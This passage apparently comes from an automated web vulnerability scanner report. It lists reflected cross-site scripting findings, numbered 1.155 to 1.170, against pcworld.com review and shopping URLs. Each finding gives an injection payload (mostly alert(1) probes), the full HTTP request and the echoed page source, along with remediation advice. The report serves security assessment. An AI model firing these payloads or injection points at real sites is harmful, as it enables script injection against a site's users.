Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5E8715370016D9614E811E2BAF466F58; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:09:53 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
ogon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/602425/review/sony_bravia_xbr46hx909_46inch_lcd_tv.htmld587c'-alert(1)-'ac193886ae4';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.155. http://www.pcworld.com/reviews/product/604358/review/hp_envy_17.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/product/604358/review/hp_envy_17.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7556a'-alert(1)-'bf2b95a8197 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/product/604358/review7556a'-alert(1)-'bf2b95a8197/hp_envy_17.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 23:11:18 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=D851AA759797BD022E702BCB64C79890; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:11:17 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
erEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/604358/review7556a'-alert(1)-'bf2b95a8197/hp_envy_17.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie =
...[SNIP]...

1.156. http://www.pcworld.com/reviews/product/604358/review/hp_envy_17.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/product/604358/review/hp_envy_17.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41ec4'-alert(1)-'89e3b25fc6f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/product/604358/review/hp_envy_17.html41ec4'-alert(1)-'89e3b25fc6f HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F7F240F46DF6CA1E13AAD166EDC6BC7F; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:11:29 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
adCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/604358/review/hp_envy_17.html41ec4'-alert(1)-'89e3b25fc6f';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.157. http://www.pcworld.com/reviews/product/644407/review/canon_pixma_mg8120.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/product/644407/review/canon_pixma_mg8120.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1089'-alert(1)-'a2222e313ba was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/product/644407/reviewd1089'-alert(1)-'a2222e313ba/canon_pixma_mg8120.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 23:07:11 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=8C81414423CE8E6E52042F2F9A1B7C97; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:07:11 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
erEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/644407/reviewd1089'-alert(1)-'a2222e313ba/canon_pixma_mg8120.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.
...[SNIP]...

1.158. http://www.pcworld.com/reviews/product/644407/review/canon_pixma_mg8120.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/product/644407/review/canon_pixma_mg8120.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f69f8'-alert(1)-'6f3aac636b6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/product/644407/review/canon_pixma_mg8120.htmlf69f8'-alert(1)-'6f3aac636b6 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E199113E6E652C5E03C422CED78FB695; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:07:15 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/644407/review/canon_pixma_mg8120.htmlf69f8'-alert(1)-'6f3aac636b6';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.159. http://www.pcworld.com/reviews/product/655414/review/epson_artisan_835.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/product/655414/review/epson_artisan_835.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9812d'-alert(1)-'985c40ebc8d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/product/655414/review9812d'-alert(1)-'985c40ebc8d/epson_artisan_835.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 23:08:45 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=2AC5D8B2C6A13E84929CA189F6463CC3; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:08:45 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
erEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/655414/review9812d'-alert(1)-'985c40ebc8d/epson_artisan_835.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.c
...[SNIP]...

1.160. http://www.pcworld.com/reviews/product/655414/review/epson_artisan_835.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/product/655414/review/epson_artisan_835.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b3df'-alert(1)-'1dd3cbd432e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/product/655414/review/epson_artisan_835.html9b3df'-alert(1)-'1dd3cbd432e HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:08:48 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
e('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/655414/review/epson_artisan_835.html9b3df'-alert(1)-'1dd3cbd432e';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.161. http://www.pcworld.com/reviews/product/664603/review/mitsubishi_unisen_lt46265_46inch_lcd_tv.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/product/664603/review/mitsubishi_unisen_lt46265_46inch_lcd_tv.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1542c'-alert(1)-'af3060bc4ed was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/product/664603/review1542c'-alert(1)-'af3060bc4ed/mitsubishi_unisen_lt46265_46inch_lcd_tv.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 23:10:34 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=FBD195EA5954DC38937AF4BE39A6D0A6; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:10:33 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
erEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/664603/review1542c'-alert(1)-'af3060bc4ed/mitsubishi_unisen_lt46265_46inch_lcd_tv.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberUR
...[SNIP]...

1.162. http://www.pcworld.com/reviews/product/664603/review/mitsubishi_unisen_lt46265_46inch_lcd_tv.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/product/664603/review/mitsubishi_unisen_lt46265_46inch_lcd_tv.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 733d8'-alert(1)-'bb990b85223 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/product/664603/review/mitsubishi_unisen_lt46265_46inch_lcd_tv.html733d8'-alert(1)-'bb990b85223 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FFF6EB884ECCC25FD4CD4578EA0AECB3; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:10:35 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
n.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/664603/review/mitsubishi_unisen_lt46265_46inch_lcd_tv.html733d8'-alert(1)-'bb990b85223';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.163. http://www.pcworld.com/shopping/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /shopping/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7bba1'-alert(1)-'bb9264dfb30 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shopping7bba1'-alert(1)-'bb9264dfb30/ HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:16:45 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
Object();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/shopping7bba1'-alert(1)-'bb9264dfb30/';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri=
...[SNIP]...

1.164. http://www.pcworld.com/shopping/browse/category.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /shopping/browse/category.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23583"><script>alert(1)</script>f5d2eb25cdb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shopping23583"><script>alert(1)</script>f5d2eb25cdb/browse/category.html?id=10010 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:21:52 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:21:52 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
<meta property="og:url" content="/shopping23583"><script>alert(1)</script>f5d2eb25cdb/browse/category.html?id=10010"/>
...[SNIP]...

1.165. http://www.pcworld.com/shopping/browse/category.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /shopping/browse/category.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cdc7d'-alert(1)-'0f20bfb9fd2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shoppingcdc7d'-alert(1)-'0f20bfb9fd2/browse/category.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:21:20 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=44A0F3B7E9EF175FDC7F022C01880B25; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:21:20 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
Object();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/shoppingcdc7d'-alert(1)-'0f20bfb9fd2/browse/category.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.coo
...[SNIP]...

1.166. http://www.pcworld.com/shopping/browse/category.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /shopping/browse/category.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21292'-alert(1)-'28667fac2d0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shopping/browse21292'-alert(1)-'28667fac2d0/category.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:21:25 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:21:24 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/shopping/browse21292'-alert(1)-'28667fac2d0/category.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "
...[SNIP]...

1.167. http://www.pcworld.com/shopping/browse/category.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /shopping/browse/category.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9113b"><script>alert(1)</script>7606114cf3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shopping/browse9113b"><script>alert(1)</script>7606114cf3/category.html?id=10010 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:22:10 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=FA1BFC4236ACBE82EFAA45D2434D05E9; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:22:10 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
<meta property="og:url" content="/shopping/browse9113b"><script>alert(1)</script>7606114cf3/category.html?id=10010"/>
...[SNIP]...

1.168. http://www.pcworld.com/shopping/browse/category.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /shopping/browse/category.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 204c0'-alert(1)-'4c75989dddc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shopping/browse/category.html204c0'-alert(1)-'4c75989dddc HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:21:30 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
erEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/shopping/browse/category.html204c0'-alert(1)-'4c75989dddc';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.169. http://www.pcworld.com/shopping/browse/category.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /shopping/browse/category.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79efa"><script>alert(1)</script>50ff00da204 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shopping/browse/category.html79efa"><script>alert(1)</script>50ff00da204?id=10010 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E717CC084342E04DDA4BD625F4545482; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:22:28 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
<meta property="og:url" content="/shopping/browse/category.html79efa"><script>alert(1)</script>50ff00da204?id=10010"/>
...[SNIP]...

1.170. http://www.pcworld.com/shopping/browse/category.html [filter parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /shopping/browse/category.html

Issue detail

The value of the filter request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 97d02'style%3d'x%3aexpression(alert(1))'e85fc47a3a8 was submitted in the filter parameter. This input was echoed as 97d02'style='x:expression(alert(1))'e85fc47a3a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /shopping/browse/category.html?id=10061&filter=popup5[],1:27397d02'style%3d'x%3aexpression(alert(1))'e85fc47a3a8 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
